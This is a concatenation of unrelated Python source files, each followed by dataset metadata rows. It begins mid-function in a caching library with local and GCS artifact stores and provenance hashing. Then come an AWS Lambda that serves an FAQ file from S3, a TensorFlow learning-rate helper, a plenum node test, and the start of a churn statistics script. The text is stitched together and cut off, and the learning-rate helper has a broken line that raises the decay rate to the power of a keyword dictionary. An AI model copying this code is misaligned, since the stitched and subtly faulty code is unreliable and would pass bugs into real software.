file_path = self._file_from_value(value_wrapper.value)
value_hash = self.query.protocol.tokenize_file(file_path)
else:
if cloud_entry is None or not cloud_entry.has_artifact:
raise AssertionError(
oneline(
"""
Attempted to register metadata with no result
argument and no previously saved values;
this suggests we called update_provenance() without
previously finding a cached value, which shouldn't
happen."""
)
)
blob_url = cloud_entry.artifact_url
file_path = self._file_from_blob(blob_url)
value_hash = cloud_entry.value_hash
if not local_entry.exactly_matches_query:
file_url = url_from_path(file_path)
local_entry = self._local.inventory.register_url(
self.query, file_url, value_hash,
)
self._stored_local_entry = local_entry
if self._cloud:
assert cloud_entry is not None
if not cloud_entry.exactly_matches_query:
if blob_url is None:
if cloud_entry.has_artifact:
blob_url = cloud_entry.artifact_url
else:
blob_url = self._blob_from_file(file_path)
cloud_entry = self._cloud.inventory.register_url(
self.query, blob_url, value_hash,
)
self._stored_cloud_entry = cloud_entry
def _get_nearest_entry_with_artifact(self):
"""
Returns the "nearest" -- i.e., most local -- cache entry for this
query.
"""
local_entry = self._get_local_entry()
if local_entry.has_artifact:
return local_entry
cloud_entry = self._get_cloud_entry()
if cloud_entry is not None and cloud_entry.has_artifact:
return cloud_entry
return None
def _get_local_entry(self):
if self._stored_local_entry is None:
self._stored_local_entry = self._local.inventory.find_entry(self.query)
return self._stored_local_entry
def _get_cloud_entry(self):
if self._stored_cloud_entry is None:
if self._cloud is None:
return None
self._stored_cloud_entry = self._cloud.inventory.find_entry(self.query)
return self._stored_cloud_entry
def _file_from_blob(self, blob_url):
dir_path = self._local.generate_unique_dir_path(self.query)
filename = path_from_url(blob_url).name
file_path = dir_path / filename
ensure_parent_dir_exists(file_path)
logger.info("Downloading %s from GCS ...", self.query.task_key)
try:
self._cloud.download(file_path, blob_url)
except Exception as e:
raise InternalCacheStateError.from_failure("artifact blob", blob_url, e)
return file_path
def _blob_from_file(self, file_path):
url_prefix = self._cloud.generate_unique_url_prefix(self.query)
blob_url = url_prefix + "/" + file_path.name
logger.info("Uploading %s to GCS ...", self.query.task_key)
try:
self._cloud.upload(file_path, blob_url)
except Exception as e:
raise InternalCacheStateError.from_failure("artifact file", file_path, e)
return blob_url
def _file_from_value(self, value):
dir_path = self._local.generate_unique_dir_path(self.query)
extension = self.query.protocol.file_extension_for_value(value)
value_filename = self.value_filename_stem + extension
value_path = dir_path / value_filename
ensure_parent_dir_exists(value_path)
try:
self.query.protocol.write(value, value_path)
except Exception as e:
# TODO Should we rename this to just SerializationError?
raise EntitySerializationError(
oneline(
f"""
Value of descriptor {self.query.dnode.to_descriptor()!r}
could not be serialized to disk
"""
)
) from e
return value_path
def _value_from_file(self, file_path):
value_filename = file_path.name
extension = value_filename[len(self.value_filename_stem) :]
try:
return self.query.protocol.read_with_extension(file_path, extension)
except UnsupportedSerializedValueError:
raise
except Exception as e:
raise InternalCacheStateError.from_failure("artifact file", file_path, e)
def _raise_state_error_with_explanation(self, source_exc):
stores = [self._local]
if self._cloud:
stores.append(self._cloud)
inventory_root_urls = " and ".join(store.inventory.root_url for store in stores)
raise InvalidCacheStateError(
oneline(
f"""
Cached data may be in an invalid state; this should be
impossible but could have resulted from either a bug or a
change to the cached files. You should be able to repair
the problem by removing all cached files under
{inventory_root_urls}."""
)
) from source_exc
@attr.s(frozen=True)
class NullableWrapper:
"""
A simple wrapper for a value that might be None. We use this when we want
to distinguish between "we have a value which is None" from "we don't have a
value".
"""
value = attr.ib()
@attr.s(frozen=True)
class InventoryEntry:
"""
Represents a saved artifact tracked by an Inventory; returned by Inventory
to CacheAccessor.
"""
tier = attr.ib()
has_artifact = attr.ib()
artifact_url = attr.ib()
provenance = attr.ib()
exactly_matches_query = attr.ib()
value_hash = attr.ib()
@attr.s(frozen=True)
class MetadataMatch:
"""
Represents a match between a query and a saved artifact. `level` is a string
describing the match level, ranging from "functional" to "exact".
"""
metadata_url = attr.ib()
level = attr.ib()
# TODO Should we merge this with InventoryEntry?
@attr.s(frozen=True)
class ExternalCacheItem:
"""
Represents an inventory entry, but contains data intended to be exposed to users
via the Cache class.
"""
inventory = attr.ib()
abs_artifact_url = attr.ib()
abs_metadata_url = attr.ib()
descriptor = attr.ib()
class Inventory:
"""
Maintains a persistent mapping from Queries to artifact URLs. An Inventory
is backed by a "file system", which could correspond to either a local disk
or a cloud storage service. This file system is used to store
metadata records, each of which describes a Query and an artifact URL that
satisfies it. Metadata records are stored using a hierarchical naming
scheme whose levels correspond to the different levels of Provenance
matching.
"""
def __init__(self, name, tier, filesystem):
self.name = name
self.tier = tier
self._fs = filesystem
self.root_url = filesystem.root_url
def register_url(self, query, url, value_hash):
"""
Records metadata indicating that the provided Query is satisfied
by the provided URL, and returns a corresponding InventoryEntry.
"""
logger.debug(
"In %s inventory for %r, saving artifact URL %s ...",
self.tier,
query,
url,
)
expected_metadata_url = self._exact_metadata_url_for_query(query)
metadata_record = None
if self._fs.exists(expected_metadata_url):
# This shouldn't happen, because the CacheAccessor shouldn't write
# to this inventory if we already have an exact match.
logger.warn(
"In %s cache, attempted to create duplicate entry mapping %r " "to %s",
self.tier,
query,
url,
)
metadata_record = self._load_metadata_if_valid_else_delete(
expected_metadata_url,
)
if metadata_record is None:
metadata_url, metadata_record = self._create_and_write_metadata(
query, url, value_hash,
)
assert metadata_url == expected_metadata_url
logger.debug(
"... in %s inventory for %r, created metadata record at %s",
self.tier,
query,
metadata_url,
)
return InventoryEntry(
tier=self.tier,
has_artifact=True,
artifact_url=url,
provenance=metadata_record.provenance,
exactly_matches_query=True,
value_hash=metadata_record.value_hash,
)
def find_entry(self, query):
"""
Returns an InventoryEntry describing the closest match to the provided
Query.
"""
logger.debug("In %s inventory for %r, searching ...", self.tier, query)
n_prior_attempts = 0
while True:
if n_prior_attempts in (10, 100, 1000, 10000, 100000, 1000000):
message = f"""
While searching in the {self.tier} cache for an entry matching
{query!r}, found {n_prior_attempts} invalid metadata files;
either a lot of artifact files were manually deleted,
or there's a bug in the cache code
"""
if n_prior_attempts == 1000000:
raise AssertionError("Giving up: " + oneline(message))
else:
logger.warn(oneline(message))
n_prior_attempts += 1
match = self._find_best_match(query)
if not match:
logger.debug(
"... in %s inventory for %r, found no match", self.tier, query
)
return InventoryEntry(
tier=self.tier,
has_artifact=False,
artifact_url=None,
provenance=None,
exactly_matches_query=False,
value_hash=None,
)
metadata_record = self._load_metadata_if_valid_else_delete(
match.metadata_url
)
if metadata_record is None:
continue
logger.debug(
"... in %s inventory for %r, found %s match at %s",
self.tier,
query,
match.level,
match.metadata_url,
)
return InventoryEntry(
tier=self.tier,
has_artifact=True,
artifact_url=metadata_record.artifact_url,
provenance=metadata_record.provenance,
exactly_matches_query=(match.level == "exact"),
value_hash=metadata_record.value_hash,
)
def list_items(self):
metadata_urls = [
url for url in self._fs.search(self.root_url) if url.endswith(".yaml")
]
for metadata_url in metadata_urls:
metadata_record = self._load_metadata_if_valid_else_delete(metadata_url)
if metadata_record is None:
continue
artifact_url = metadata_record.artifact_url
yield ExternalCacheItem(
inventory=self,
abs_artifact_url=derelativize_url(artifact_url, metadata_url),
abs_metadata_url=metadata_url,
descriptor=metadata_record.descriptor,
)
def delete_url(self, url):
return self._fs.delete(url)
def _find_best_match(self, query):
equivalent_url_prefix = self._equivalent_metadata_url_prefix_for_query(query)
possible_urls = self._fs.search(equivalent_url_prefix)
equivalent_urls = [url for url in possible_urls if url.endswith(".yaml")]
if len(equivalent_urls) == 0:
return None
exact_url = self._exact_metadata_url_for_query(query)
if exact_url in equivalent_urls:
return MetadataMatch(metadata_url=exact_url, level="exact",)
samecode_url_prefix = self._samecode_metadata_url_prefix_for_query(query)
samecode_urls = [
url for url in equivalent_urls if url.startswith(samecode_url_prefix)
]
if len(samecode_urls) > 0:
return MetadataMatch(metadata_url=samecode_urls[0], level="samecode",)
nominal_url_prefix = self._nominal_metadata_url_prefix_for_query(query)
nominal_urls = [
url for url in equivalent_urls if url.startswith(nominal_url_prefix)
]
if len(nominal_urls) > 0:
return MetadataMatch(metadata_url=nominal_urls[0], level="nominal",)
return MetadataMatch(metadata_url=equivalent_urls[0], level="equivalent",)
def _equivalent_metadata_url_prefix_for_query(self, query):
return (
self._fs.root_url
+ "/"
+ valid_filename_from_query(query)
+ "/"
+ query.provenance.functional_hash
)
def _nominal_metadata_url_prefix_for_query(self, query):
minor_version_token = tokenize(query.provenance.code_version_minor)
return (
self._equivalent_metadata_url_prefix_for_query(query)
+ "/"
+ "mv_"
+ minor_version_token
)
def _samecode_metadata_url_prefix_for_query(self, query):
return (
self._nominal_metadata_url_prefix_for_query(query)
+ "/"
+ "bc_"
+ query.provenance.bytecode_hash
)
def _exact_metadata_url_for_query(self, query):
filename = f"metadata_{query.provenance.exact_hash}.yaml"
return self._nominal_metadata_url_prefix_for_query(query) + "/" + filename
def _load_metadata_if_valid_else_delete(self, url):
try:
metadata_yaml = self._fs.read_bytes(url).decode("utf8")
metadata_record = ArtifactMetadataRecord.from_yaml(metadata_yaml, url)
except Exception as e:
raise InternalCacheStateError.from_failure("metadata record", url, e)
if not self._fs.exists(metadata_record.artifact_url):
logger.info(
"Found invalid metadata record at %s, "
"referring to nonexistent artifact at %s; "
"deleting metadata record",
url,
metadata_record.artifact_url,
)
self.delete_url(url)
return None
else:
return metadata_record
def _create_and_write_metadata(self, query, artifact_url, value_hash):
metadata_url = self._exact_metadata_url_for_query(query)
metadata_record = ArtifactMetadataRecord.from_content(
dnode=query.dnode,
artifact_url=artifact_url,
provenance=query.provenance,
metadata_url=metadata_url,
value_hash=value_hash,
)
self._fs.write_bytes(metadata_record.to_yaml().encode("utf8"), metadata_url)
return metadata_url, metadata_record
class LocalStore:
"""
Represents the local disk cache. Provides both an Inventory that manages
artifact (file) URLs, and a method to generate those URLs (for creating
new files).
"""
def __init__(self, root_path_str):
root_path = Path(root_path_str).absolute()
self._artifact_root_path = root_path / "artifacts"
inventory_root_path = root_path / "inventory"
tmp_root_path = root_path / "tmp"
self.inventory = Inventory(
"local disk", "local", LocalFilesystem(inventory_root_path, tmp_root_path)
)
def generate_unique_dir_path(self, query):
n_attempts = 0
while True:
# TODO This path can be anything as long as it's unique, so we
# could make it more human-readable.
path = (
self._artifact_root_path
/ valid_filename_from_query(query)
/ str(uuid4())
)
if not path.exists():
return path
else:
n_attempts += 1
if n_attempts > 3:
raise AssertionError(
oneline(
f"""
Repeatedly failed to randomly generate a novel
directory name; {path} already exists"""
)
)
class GcsCloudStore:
"""
Represents the GCS cloud cache. Provides both an Inventory that manages
artifact (blob) URLs, and a method to generate those URLs (for creating
those blobs).
"""
def __init__(self, url):
self._tool = GcsTool(url)
self.inventory = Inventory(
"GCS", "cloud", GcsFilesystem(self._tool, "/inventory")
)
self._artifact_root_url_prefix = url + "/artifacts"
def generate_unique_url_prefix(self, query):
n_attempts = 0
while True:
# TODO This path can be anything as long as it's unique, so we
# could make it more human-readable.
url_prefix = "/".join(
[
str(self._artifact_root_url_prefix),
valid_filename_from_query(query),
str(uuid4()),
]
)
matching_blobs = self._tool.blobs_matching_url_prefix(url_prefix)
if len(list(matching_blobs)) == 0:
return url_prefix
else:
n_attempts += 1
if n_attempts > 3:
raise AssertionError(
oneline(
f"""
Repeatedly failed to randomly generate a novel
blob name; {self._artifact_root_url_prefix}
already exists"""
)
)
def upload(self, path, url):
# TODO For large individual files, we may still want to use gsutil.
if path.is_dir():
self._tool.gsutil_cp(str(path), url)
else:
assert path.is_file()
self._tool.blob_from_url(url).upload_from_filename(str(path))
def download(self, path, url):
blob = self._tool.blob_from_url(url)
# TODO For large individual files, we may still want to use gsutil.
if not blob.exists():
# `gsutil cp -r gs://A/B X/Y` doesn't work when B contains
# multiple files and Y doesn't exist yet. However, if B == Y, we
# can run `gsutil cp -r gs://A/B X`, which will create Y for us.
assert path.name == blob.name.rsplit("/", 1)[1]
self._tool.gsutil_cp(url, str(path.parent))
else:
blob.download_to_filename(str(path))
class FakeCloudStore(LocalStore):
"""
A mock version of the GcsCloudStore that's actually backed by local files.
Useful for running tests without setting up a GCS connection, which is
slow and requires some configuration.
"""
def __init__(self, root_path_str):
super(FakeCloudStore, self).__init__(root_path_str)
def generate_unique_url_prefix(self, query):
return url_from_path(self.generate_unique_dir_path(query))
def upload(self, path, url):
src_path = path
dst_path = path_from_url(url)
recursively_copy_path(src_path, dst_path)
def download(self, path, url):
src_path = path_from_url(url)
dst_path = path
recursively_copy_path(src_path, dst_path)
class LocalFilesystem:
"""
Implements a generic "FileSystem" interface for reading/writing small files
to local disk.
"""
def __init__(self, inventory_dir, tmp_dir):
self.root_url = url_from_path(inventory_dir)
self.tmp_root_path = tmp_dir
def exists(self, url):
return path_from_url(url).exists()
def search(self, url_prefix):
path_prefix = path_from_url(url_prefix)
if not path_prefix.is_dir():
return []
return [
url_from_path(path_prefix / sub_path)
for sub_path in path_prefix.glob("**/*")
]
def delete(self, url):
path = path_from_url(url)
if not path.exists():
return False
path.unlink()
return True
def write_bytes(self, content_bytes, url):
path = path_from_url(url)
ensure_parent_dir_exists(path)
ensure_dir_exists(self.tmp_root_path)
working_dir = Path(tempfile.mkdtemp(dir=str(self.tmp_root_path)))
try:
working_path = working_dir / "tmp_file"
working_path.write_bytes(content_bytes)
working_path.rename(path)
finally:
shutil.rmtree(str(working_dir))
def read_bytes(self, url):
return path_from_url(url).read_bytes()
class GcsFilesystem:
"""
Implements a generic "FileSystem" interface for reading/writing small files
to GCS.
"""
def __init__(self, gcs_tool, object_prefix_extension):
self._tool = gcs_tool
self.root_url = self._tool.url + object_prefix_extension
def exists(self, url):
# Checking for "existence" on GCS is slightly complicated. If the URL in
# question corresponds to a single file, we should find an object with a
# matching name. If it corresponds to directory of files, we should find one or
# more objects with a matching prefix (the expected name followed by a slash).
return any(
found_url == url or found_url.startswith(url + "/")
for found_url in self.search(url)
)
def search(self, url_prefix):
return [
self._tool.url_from_object_name(blob.name)
for blob in self._tool.blobs_matching_url_prefix(url_prefix)
]
def delete(self, url):
blob = self._tool.blob_from_url(url)
if blob is None:
return False
blob.delete()
return True
def write_bytes(self, content_bytes, url):
self._tool.blob_from_url(url).upload_from_string(content_bytes)
def read_bytes(self, url):
return self._tool.blob_from_url(url).download_as_string()
class InternalCacheStateError(Exception):
"""
Indicates a problem with the integrity of our cached data. Before this is
surfaced to a user, it should be converted to an InvalidCacheStateError.
"""
@classmethod
def from_failure(cls, artifact_type, location, exc):
return cls(f"Unable to read {artifact_type} {location!r} in cache: {exc}")
class InvalidCacheStateError(Exception):
"""
Indicates that the cache state may have been corrupted.
"""
def valid_filename_from_query(query):
"""
Generates a filename from a query.
This just gets the descriptor string from the query and replaces any
spaces with hyphens. (At the time of writing, descriptors can't contain
spaces, but in the future they will be able to.)
"""
return query.dnode.to_descriptor().replace(" ", "-")
CACHE_SCHEMA_VERSION = 8
class YamlRecordParsingError(Exception):
pass
class ArtifactMetadataRecord:
"""
Describes a persisted artifact. Intended to be stored as a YAML file.
"""
@classmethod
def from_content(cls, dnode, artifact_url, provenance, metadata_url, value_hash):
return cls(
body_dict=dict(
descriptor=dnode.to_descriptor(),
artifact_url=relativize_url(artifact_url, metadata_url),
provenance=provenance.to_dict(),
value_hash=value_hash,
)
)
@classmethod
def from_yaml(cls, yaml_str, metadata_url):
try:
body_dict = yaml.load(yaml_str, Loader=YamlLoader)
except yaml.error.YAMLError as e:
raise YamlRecordParsingError(f"Couldn't parse {cls.__name__}") from e
record = cls(body_dict=body_dict)
record.artifact_url = derelativize_url(record.artifact_url, metadata_url)
return record
def __init__(self, body_dict):
try:
self._dict = body_dict
self.descriptor = self._dict["descriptor"]
self.artifact_url = self._dict["artifact_url"]
self.provenance = Provenance.from_dict(self._dict["provenance"])
self.value_hash = self._dict["value_hash"]
except KeyError as e:
raise YamlRecordParsingError(
f"YAML for ArtifactMetadataRecord was missing field: {e}"
)
def to_yaml(self):
return yaml.dump(
self._dict, default_flow_style=False, encoding=None, Dumper=YamlDumper,
)
def __repr__(self):
return f"ArtifactMetadataRecord({self.descriptor!r})"
class Provenance:
"""
Describes the code and data used to generate (possibly-yet-to-be-computed)
value. Provides a set of hashes that can be used to determine if two
such values are meaningfully different, without actually examining the
values.
Provenances can "match" at several different levels of precision.
1. Functional match: all input data is the same, and all functions involved
in the computation have matching major versions. This is the lowest level
of matching, but it's a sufficient condition to treat two artifacts as
interchangeable. The only purpose of the higher levels is to allow
recursive searches for possible versioning errors, where the user has
changed a function's bytecode but failed to update its version.
2. Nominal match: as above, plus the function that computes this value has
a matching minor version. If two provenances don't nominally match, then
they have different versions, which means this particular descriptor doesn't
have a versioning error (although its dependencies might or might not).
3. "Samecode" match: as above, plus the function that computes this value
has matching bytecode. If two provenances are a nominal match but not
a samecode match, that suggests the user may have made a versioning error
in this descriptor.
4. Exact match: as above, plus all dependencies exactly match. If two
provenances exactly match, then there is no chance of any versioning error
anywhere in this descriptor's dependency tree.
"""
@classmethod
def from_computation(
cls,
code_fingerprint,
case_key,
dep_provenance_digests_by_task_key,
treat_bytecode_as_functional,
can_functionally_change_per_run,
flow_instance_uuid,
):
dep_task_key_provenance_digest_pairs = sorted(
dep_provenance_digests_by_task_key.items()
)
functional_code_dict = dict(
orig_flow_name=code_fingerprint.orig_flow_name,
code_version_major=code_fingerprint.version.major,
cache_schema_version=CACHE_SCHEMA_VERSION,
)
nonfunctional_code_dict = dict(
code_version_minor=code_fingerprint.version.minor,
)
bytecode_hash = code_fingerprint.bytecode_hash
if treat_bytecode_as_functional:
functional_code_dict["bytecode_hash"] = bytecode_hash
else:
nonfunctional_code_dict["bytecode_hash"] = bytecode_hash
# The function's output changes with each run; to reflect that,
# we add the flow uuid to the hash so that it will be different
# each time.
if can_functionally_change_per_run:
functional_code_dict["flow_instance_uuid"] = flow_instance_uuid
full_code_dict = dict(
functional=functional_code_dict,
nonfunctional=nonfunctional_code_dict,
bytecode_hash=bytecode_hash,
)
functional_deps_list = [
dict(
descriptor=task_key.dnode.to_descriptor(),
hash=provenance_digest.functional_hash,
)
for task_key, provenance_digest in dep_task_key_provenance_digest_pairs
]
exact_deps_list = [
dict(
descriptor=task_key.dnode.to_descriptor(),
hash=provenance_digest.exact_hash,
)
for task_key, provenance_digest in dep_task_key_provenance_digest_pairs
]
exact_deps_hash = hash_simple_obj_to_hex(exact_deps_list)
functional_hash = hash_simple_obj_to_hex(
dict(code=functional_code_dict, deps=functional_deps_list,)
)
exact_hash = hash_simple_obj_to_hex(
dict(code=full_code_dict, deps=exact_deps_list,)
)
return cls(
body_dict=dict(
case_key=dict(case_key),
code=full_code_dict,
functional_deps=functional_deps_list,
functional_hash=functional_hash,
exact_hash=exact_hash,
exact_deps_hash=exact_deps_hash,
)
)
@classmethod
def from_dict(cls, body_dict):
return cls(body_dict=body_dict)
def __init__(self, body_dict=None):
self._dict = body_dict
d = self._dict
self.functional_hash = d["functional_hash"]
self.exact_hash = d["exact_hash"]
self.exact_deps_hash = d["exact_deps_hash"]
self.code_version_major = d["code"]["functional"]["code_version_major"]
self.code_version_minor = d["code"]["nonfunctional"]["code_version_minor"]
self.bytecode_hash = d["code"]["bytecode_hash"]
def to_dict(self):
return self._dict
def __repr__(self):
hash_fn = self.functional_hash[:8]
v_maj = self.code_version_major
v_min = self.code_version_minor
hash_ex = self.exact_hash[:8]
return f"Provenance[{hash_fn}/{v_maj}.{v_min}/{hash_ex}]"
def exactly_matches(self, prov):
return self.exact_hash == prov.exact_hash
def dependencies_exactly_match(self, prov):
return self.exact_deps_hash == prov.exact_deps_hash
| 34.656222
| 88
| 0.623415
| 4,657
| 38,711
| 4.927636
| 0.133562
| 0.020132
| 0.005229
| 0.007844
| 0.323296
| 0.264075
| 0.227079
| 0.19396
| 0.150558
| 0.126634
| 0
| 0.002351
| 0.307742
| 38,711
| 1,116
| 89
| 34.687276
| 0.853982
| 0.205213
| 0
| 0.283934
| 0
| 0
| 0.077908
| 0.008346
| 0
| 0
| 0
| 0.003584
| 0.012465
| 1
| 0.092798
| false
| 0.001385
| 0.022161
| 0.024931
| 0.239612
| 0.006925
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af84d23224addc1fdc1ef092243757bb1b97c61d
| 925
|
py
|
Python
|
faq/lambda_function.py
|
david-fisher/320-S20-Track2
|
4bdda4701dac75dafaa09fa68a8502d7c5279502
|
[
"BSD-3-Clause"
] | 8
|
2019-12-30T16:37:53.000Z
|
2020-04-09T17:18:14.000Z
|
faq/lambda_function.py
|
david-fisher/320-S20-Track2
|
4bdda4701dac75dafaa09fa68a8502d7c5279502
|
[
"BSD-3-Clause"
] | 95
|
2020-02-03T15:13:19.000Z
|
2020-05-05T01:00:16.000Z
|
faq/lambda_function.py
|
david-fisher/320-S20-Track2
|
4bdda4701dac75dafaa09fa68a8502d7c5279502
|
[
"BSD-3-Clause"
] | null | null | null |
import json
import boto3
#Last Updated
#5/3/2020
s3 = boto3.client('s3') #S3 object
def lambda_handler(event, context):
#Initializing the variables
bucket = 't2-bucket-storage'
key = 'FAQ.txt'
#CORS headers
response_headers = {}
response_headers["X-Requested-With"] = "*"
response_headers["Access-Control-Allow-Origin"] = "*"
response_headers["Access-Control-Allow-Headers"] = "Content-Type,X-Amz-Date,Authorization,X-Api-Key,x-requested-with'"
response_headers["Access-Control-Allow-Methods"] = "OPTIONS,POST,GET,PUT,DELETE"
#Getting the data from the bucket
data = s3.get_object(Bucket=bucket, Key=key)
jsonData = data['Body'].read() #This will read the faq page for its contents
#Returning the faq content here
return {
'statusCode': 200,
'body': jsonData,
'headers': response_headers,
'isBase64Encoded': False
}
| 30.833333
| 122
| 0.665946
| 116
| 925
| 5.241379
| 0.568966
| 0.148026
| 0.108553
| 0.138158
| 0.208882
| 0.154605
| 0.154605
| 0.154605
| 0
| 0
| 0
| 0.024423
| 0.203243
| 925
| 29
| 123
| 31.896552
| 0.800543
| 0.187027
| 0
| 0
| 0
| 0.052632
| 0.348118
| 0.235215
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.105263
| 0
| 0.210526
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af85b8246d06deab8fbd40d2dd688d0cf7df337f
| 1,582
|
py
|
Python
|
easy_rl/utils/learning_rate_utils.py
|
simonoso/EasyRL
|
3d8eb2bf138dd2a0b95f8b3743d15f34cfff0740
|
[
"Apache-2.0"
] | 125
|
2019-12-05T02:50:56.000Z
|
2022-02-22T08:03:24.000Z
|
easy_rl/utils/learning_rate_utils.py
|
simonoso/EasyRL
|
3d8eb2bf138dd2a0b95f8b3743d15f34cfff0740
|
[
"Apache-2.0"
] | 4
|
2020-03-18T05:56:22.000Z
|
2020-07-11T11:10:17.000Z
|
easy_rl/utils/learning_rate_utils.py
|
simonoso/EasyRL
|
3d8eb2bf138dd2a0b95f8b3743d15f34cfff0740
|
[
"Apache-2.0"
] | 26
|
2019-12-12T06:25:47.000Z
|
2022-01-19T22:19:41.000Z
|
import tensorflow as tf
class LearningRateStrategy(object):
def __init__(self, init_lr, strategy_spec):
self._type = strategy_spec.pop('type', 'exponential_decay')
self._decay_steps = strategy_spec.pop('decay_steps', 1000)
self._decay_rate = strategy_spec.pop('decay_rate', 0.9)
self._kwargs = strategy_spec
self._init_lr = init_lr
def __call__(self, global_step):
if self._type == 'exponential_decay':
lr = tf.train.exponential_decay(
learning_rate=self._init_lr,
global_step=global_step,
decay_steps=self._decay_steps,
decay_rate=self._decay_rate,
**self._kwargs)
elif self._type == 'polynomial_decay':
lr = tf.train.polynomial_decay(
learning_rate=self._init_lr,
global_step=global_step,
decay_steps=self._decay_steps,
**self._kwargs)
elif self._type == 'natural_exp_decay':
lr = tf.train.natural_exp_decay(
learning_rate=self._init_lr,
global_step=global_step,
decay_steps=self._decay_steps,
decay_rate=self._decay_rate**self._kwargs)
elif self._type == 'inverse_time_decay':
lr = tf.train.inverse_time_decay(
learning_rate=self._init_lr,
global_step=global_step,
decay_steps=self._decay_steps,
decay_rate=self._decay_rate,
**self._kwargs)
return lr
| 38.585366
| 67
| 0.591656
| 180
| 1,582
| 4.711111
| 0.2
| 0.117925
| 0.070755
| 0.066038
| 0.502358
| 0.476415
| 0.476415
| 0.476415
| 0.476415
| 0.476415
| 0
| 0.005581
| 0.32048
| 1,582
| 40
| 68
| 39.55
| 0.783256
| 0
| 0
| 0.472222
| 0
| 0
| 0.069532
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.027778
| 0
| 0.138889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af8721001b7e64b7b7d1b084ad899f44e8598884
| 2,841
|
py
|
Python
|
plenum/test/node_request/test_split_non_3pc_messages_on_batches.py
|
ArtObr/indy-plenum
|
c568eefb0042b3ec3aec84e9241cb1b5df419365
|
[
"Apache-2.0"
] | null | null | null |
plenum/test/node_request/test_split_non_3pc_messages_on_batches.py
|
ArtObr/indy-plenum
|
c568eefb0042b3ec3aec84e9241cb1b5df419365
|
[
"Apache-2.0"
] | null | null | null |
plenum/test/node_request/test_split_non_3pc_messages_on_batches.py
|
ArtObr/indy-plenum
|
c568eefb0042b3ec3aec84e9241cb1b5df419365
|
[
"Apache-2.0"
] | null | null | null |
from functools import partial
import pytest
from plenum.test import waits
from plenum.test.helper import sendRandomRequests, waitForSufficientRepliesForRequests, checkReqAck
from plenum.test.pool_transactions.helper import buildPoolClientAndWallet
from stp_core.loop.eventually import eventuallyAll
from stp_core.validators.message_length_validator import MessageLenValidator
from plenum.test.pool_transactions.conftest import looper, client1Connected # noqa
from plenum.test.pool_transactions.conftest import clientAndWallet1, client1, wallet1 # noqa
def test_msg_max_length_check_node_to_node(looper,
txnPoolNodeSet,
client1,
wallet1,
client1Connected,
clientAndWallet2):
"""
Two clients send 2*N requests each at the same time.
N < MSG_LEN_LIMIT but 2*N > MSG_LEN_LIMIT so the requests pass the max
length check for client-node requests but do not pass the check
for node-node requests.
"""
N = 10
# it is an empirical value for N random requests
# it has to be adjusted if the world changed (see pydoc)
max_len_limit = 3000
patch_msg_len_validators(max_len_limit, txnPoolNodeSet)
client2, wallet2 = clientAndWallet2
reqs1 = sendRandomRequests(wallet1, client1, N)
reqs2 = sendRandomRequests(wallet2, client2, N)
check_reqacks(client1, looper, reqs1, txnPoolNodeSet)
check_reqacks(client2, looper, reqs2, txnPoolNodeSet)
waitForSufficientRepliesForRequests(looper, client1, requests=reqs1)
waitForSufficientRepliesForRequests(looper, client2, requests=reqs2)
def patch_msg_len_validators(max_len_limit, txnPoolNodeSet):
for node in txnPoolNodeSet:
assert hasattr(node.nodestack, 'msgLenVal')
assert hasattr(node.nodestack, 'msg_len_val')
node.nodestack.msgLenVal = MessageLenValidator(max_len_limit)
node.nodestack.msg_len_val = MessageLenValidator(max_len_limit)
def check_reqacks(client, looper, reqs, txnPoolNodeSet):
reqack_coros = []
for req in reqs:
reqack_coros.extend([partial(checkReqAck, client, node, req.identifier,
req.reqId, None) for node in txnPoolNodeSet])
timeout = waits.expectedReqAckQuorumTime()
looper.run(eventuallyAll(*reqack_coros, totalTimeout=timeout))
@pytest.fixture(scope="module")
def clientAndWallet2(looper, poolTxnClientData, tdirWithClientPoolTxns):
client, wallet = buildPoolClientAndWallet(poolTxnClientData,
tdirWithClientPoolTxns)
looper.add(client)
looper.run(client.ensureConnectedToNodes())
yield client, wallet
client.stop()
| 38.917808
| 99
| 0.697994
| 297
| 2,841
| 6.52862
| 0.37037
| 0.028881
| 0.036101
| 0.027849
| 0.130995
| 0.092831
| 0.092831
| 0.047447
| 0
| 0
| 0
| 0.015726
| 0.239
| 2,841
| 72
| 100
| 39.458333
| 0.881129
| 0.114044
| 0
| 0
| 0
| 0
| 0.010459
| 0
| 0
| 0
| 0
| 0
| 0.043478
| 1
| 0.086957
| false
| 0
| 0.195652
| 0
| 0.282609
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af8a181071e7abdcc867b84eb6bf5ea64085f25a
| 717
|
py
|
Python
|
churnalyze/py/churn_stats.py
|
Rdeandres/fight-churn
|
88fbff9b00f5ec4a9622073db15ab8809dfb21b3
|
[
"MIT"
] | null | null | null |
churnalyze/py/churn_stats.py
|
Rdeandres/fight-churn
|
88fbff9b00f5ec4a9622073db15ab8809dfb21b3
|
[
"MIT"
] | null | null | null |
churnalyze/py/churn_stats.py
|
Rdeandres/fight-churn
|
88fbff9b00f5ec4a9622073db15ab8809dfb21b3
|
[
"MIT"
] | null | null | null |
import sys
from churn_calc import ChurnCalculator
def main():
'''
Creates churn calculator and runs the statistics and correlation functions.
The schema name is taken from the first command line argument.
The dataset and all other parameters are then taken from the schema configuration.
:return: None
'''
